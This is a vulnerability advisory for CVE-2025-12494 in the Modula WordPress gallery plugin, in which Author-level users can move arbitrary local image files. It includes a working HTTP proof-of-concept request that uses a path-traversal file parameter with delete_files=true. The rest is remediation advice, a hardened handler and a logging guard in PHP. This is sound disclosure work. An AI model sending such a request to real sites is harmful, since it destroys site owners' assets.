Modula – Image Gallery (Photo Grid & Video Gallery) is a widely deployed WordPress gallery plugin (100k+ installs) used to build responsive image grids and media galleries. It includes an “import file” feature to bring images into the Media Library. During testing, we identified CVE-2025-12494, a high-impact improper authorization / unsafe file operation vulnerability: an Author+ user can supply a filesystem path to a local image and—when delete_files=true—cause WordPress’ media_handle_sideload() pipeline to move (not copy) that file into uploads, effectively removing the original asset from its source location. Because the endpoint does not enforce a base-directory allowlist (no realpath() prefix check), attackers can target application assets such as theme images, plugin graphics, or other local files readable/writable by PHP, resulting in content integrity loss and site destabilization.
| Field | Value |
| --- | --- |
| CVE | CVE-2025-12494 |
| Plugin version | Image Gallery – Photo Grid & Video Gallery <= 2.12.28 |
| Severity | High |
| All-time downloads | 5 475 776 |
| Active installations | 100 000+ |
| Publicly published | November 14, 2025 |
| Last updated | November 14, 2025 |
| Researcher | Dmitrii Ignatyev |
| PoC | Yes |
| Exploit | No |
| Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-12494 , https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/modula-best-grid-gallery/image-gallery-photo-grid-video-gallery-21228-improper-authorization-to-authenticated-author-arbitrary-image-file-move |
Timeline
| Date | Event |
| --- | --- |
| October 21, 2025 | Plugin testing and vulnerability detection in the Image Gallery – Photo Grid & Video Gallery have been completed |
| October 21, 2025 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
| November 14, 2025 | Registered CVE-2025-12494 |
Discovery of the Vulnerability
The vulnerable AJAX action is modula_import_file (/wp-admin/admin-ajax.php). It accepts a file parameter that is treated as a local path and (when delete_files=true) routes it through media_handle_sideload(). In typical WordPress flows, “sideload” implies moving a temporary upload into wp-content/uploads/. Here, Modula accepts attacker-controlled paths without validating that the file originates from a safe import directory. There is no canonicalization/normalization check (realpath) ensuring the file resides within an approved base path. Authorization is limited to Author+ (via nonce + upload_files capability), which is insufficient given the destructive nature of moving files outside uploads.
Understanding Missing Authorization Attacks
In WordPress, endpoints that manipulate files must enforce both capability checks and object/path restrictions. Checking upload_files is appropriate for uploading new media, but it is not enough to allow arbitrary filesystem moves. A secure implementation would restrict imports to:
- files already inside wp-content/uploads/, or
- a dedicated plugin-controlled staging directory, or
- a strictly validated list of media IDs rather than raw paths.
Similar vulnerabilities have historically been abused to delete theme screenshots, break branding assets, remove plugin resources, or cause widespread “missing image” failures by moving files referenced by templates. Even if the attacker can only move image files, that can still disrupt site operation and require a restore from backups.
Exploiting the Missing Auth Vulnerability
To exploit CVE-2025-12494, an attacker with Author+ cookies sends the following request.
PoC:
```http
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://127.0.0.1/wordpress/wp-admin/edit.php?post_type=modula-gallery
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 231
Origin: http://127.0.0.1
DNT: 1
Sec-GPC: 1
Connection: keep-alive
Cookie: AUTHOR+
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

action=modula_import_file&security=modulaGalleryUpload.security_from_http://127.0.0.1/wordpress/wp-admin/post-new.php?post_type=modula-gallery&post_ID=1402&file=../../wordpress/wp-content/uploads/2025/09/geeb68a8e868a1c0271d1d2bb555c1d3ab136300569fff3ae724cbfd2d7ccb70b2555870d879e74dae6f552ee5a503ce2_1920.png&delete_files=true
```
- Site defacement and visual disruption: Attackers can remove theme screenshots, logos, hero images, or gallery resources, causing broken pages and harming brand trust.
- Operational instability: If critical image assets used by theme layout or admin previews are moved, site management workflows can break or become unreliable.
- Persistent damage: The move operation is destructive; without backups, recovery may require manual file replacement or reinstallation of themes/plugins.
- Insider abuse: Author roles are common on editorial sites—an attacker or disgruntled contributor can cause major disruption without admin access.
Recommendations for Improved Security
For plugin maintainers (Modula):
- Enforce a strict base-path allowlist: Canonicalize with realpath() and ensure the file is within a permitted directory (preferably wp_upload_dir() or a plugin staging folder). Reject anything outside.
- Disallow traversal and absolute paths: Normalize and reject any .., leading slashes, drive letters, or URL schemes.
- Never "move" external assets: If importing from local paths is needed, copy the file (copy()) rather than moving it, or require explicit admin-only confirmation for destructive behavior.
- Raise the capability requirement: Restrict destructive import operations to admins (manage_options) or a dedicated capability, not just upload_files.
- Validate file type and existence safely: Confirm the file is an image and not a symlink; enforce size limits and safe extensions.
- Log sensitive actions: Record user ID, IP, source path, and destination for forensic response.
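The following is an added example of how the maintainer recommendations above (and the allowlist discussed under "Understanding Missing Authorization Attacks") could be implemented; it is not Modula's code. Function names are hypothetical, the nonce action name is assumed, and the request parameters file, post_ID and security are taken from the PoC.

```php
<?php
// Added example, not Modula's code; names are hypothetical; file, post_ID and security come from the PoC.
// Return the canonical path of $user_path only if it is a regular image file inside $allowed_dirs.
function example_validate_import_path( $user_path, array $allowed_dirs ) {
    // Refuse URL schemes, null bytes and traversal before touching the disk.
    if ( preg_match( '#^[a-z][a-z0-9+.-]*://#i', $user_path )
        || false !== strpos( $user_path, "\0" ) || false !== strpos( $user_path, '..' ) ) {
        return new WP_Error( 'bad_path', 'Traversal, scheme or null byte in path.' );
    }
    if ( is_link( $user_path ) ) { // a link inside uploads could point at a theme asset
        return new WP_Error( 'symlink', 'Symbolic links are not importable.' );
    }
    $real = realpath( $user_path );
    if ( false === $real || ! is_file( $real ) ) {
        return new WP_Error( 'missing', 'File does not exist.' );
    }
    // Prefix check on canonical paths; the trailing separator stops /srv/uploads-old from matching /srv/uploads.
    foreach ( $allowed_dirs as $dir ) {
        $dir = realpath( $dir );
        if ( $dir && 0 === strpos( $real, rtrim( $dir, DIRECTORY_SEPARATOR ) . DIRECTORY_SEPARATOR ) ) {
            $type = wp_check_filetype_and_ext( $real, basename( $real ) ); // content-based, not extension
            if ( empty( $type['type'] ) || 0 !== strpos( $type['type'], 'image/' ) ) {
                return new WP_Error( 'not_image', 'Only image files may be imported.' );
            }
            return $real;
        }
    }
    return new WP_Error( 'outside', 'File is outside the allowed import directories.' );
}

// Hypothetical hardened handler: copies instead of moving, so the source asset survives, and logs who imported what.
function example_modula_import_file() {
    check_ajax_referer( 'modula-upload', 'security' ); // nonce action name assumed
    if ( ! current_user_can( 'upload_files' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    $path = sanitize_text_field( wp_unslash( $_POST['file'] ?? '' ) );
    $real = example_validate_import_path( $path, array( wp_upload_dir()['basedir'] ) );
    if ( is_wp_error( $real ) ) {
        wp_send_json_error( $real->get_error_message(), 400 );
    }
    $tmp = wp_tempnam( basename( $real ) ); // media_handle_sideload() consumes this copy
    copy( $real, $tmp );
    $id = media_handle_sideload( array( 'name' => basename( $real ), 'tmp_name' => $tmp ),
        absint( $_POST['post_ID'] ?? 0 ) );
    error_log( sprintf( 'modula_import_file user=%d ip=%s src=%s result=%s', get_current_user_id(),
        $_SERVER['REMOTE_ADDR'] ?? '', $real, is_wp_error( $id ) ? $id->get_error_message() : $id ) );
    is_wp_error( $id ) ? wp_send_json_error( $id->get_error_message(), 500 ) : wp_send_json_success( $id );
}
add_action( 'wp_ajax_modula_import_file', 'example_modula_import_file' );
```

Because media_handle_sideload() moves whatever tmp_name points at, handing it a temporary copy is what keeps the original asset in place regardless of delete_files.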
For site owners:
- Update immediately once a patch is released.
- Reduce access: avoid granting Author roles broadly if the plugin is used.
- Monitor admin-ajax activity for repeated modula_import_file calls and unexpected media spikes.
- Ensure backups cover both wp-content/uploads and theme/plugin directories.
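As an added example for site owners (not part of Modula or CleanTalk), a small must-use plugin can log every modula_import_file call, flag bursts, and act as an interim guard until the plugin is patched. The function name and the burst threshold are assumptions; the parameter names file and delete_files come from the PoC above.

```php
<?php
// Added example, not part of Modula or CleanTalk: drop into wp-content/mu-plugins/ as an
// interim guard. Priority 0 runs before the plugin's own handler (default priority 10);
// parameter names (file, delete_files) are those seen in the PoC.
add_action( 'wp_ajax_modula_import_file', 'example_modula_import_guard', 0 );

function example_modula_import_guard() {
    $user = get_current_user_id();
    $ip   = $_SERVER['REMOTE_ADDR'] ?? 'unknown';
    $file = sanitize_text_field( wp_unslash( $_POST['file'] ?? '' ) );
    $del  = filter_var( $_POST['delete_files'] ?? '', FILTER_VALIDATE_BOOLEAN );

    // Forensic record: who, from where, which source path, destructive or not.
    error_log( sprintf( 'modula_import_file user=%d ip=%s delete=%d file=%s', $user, $ip, $del, $file ) );

    // Burst detector: manual gallery work rarely exceeds a handful of imports per
    // minute, so a higher per-user rate is worth an alert (threshold assumed).
    $key   = 'modula_import_rate_' . $user;
    $count = (int) get_transient( $key ) + 1;
    set_transient( $key, $count, MINUTE_IN_SECONDS );
    if ( $count > 10 ) {
        error_log( "ALERT: modula_import_file burst ($count/min) user=$user ip=$ip" );
    }

    // Virtual patch until the plugin is fixed: the destructive delete_files=true
    // variant is limited to administrators; non-destructive imports continue.
    if ( $del && ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'delete_files is restricted on this site', 403 );
    }
}
```

The entries written by error_log() land in the PHP error log (or debug.log when WP_DEBUG_LOG is on), which is where the "repeated modula_import_file calls" from the list above become visible.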
By taking proactive measures to address improper authorization vulnerabilities like CVE-2025-12494, WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.
Dmitrii I.
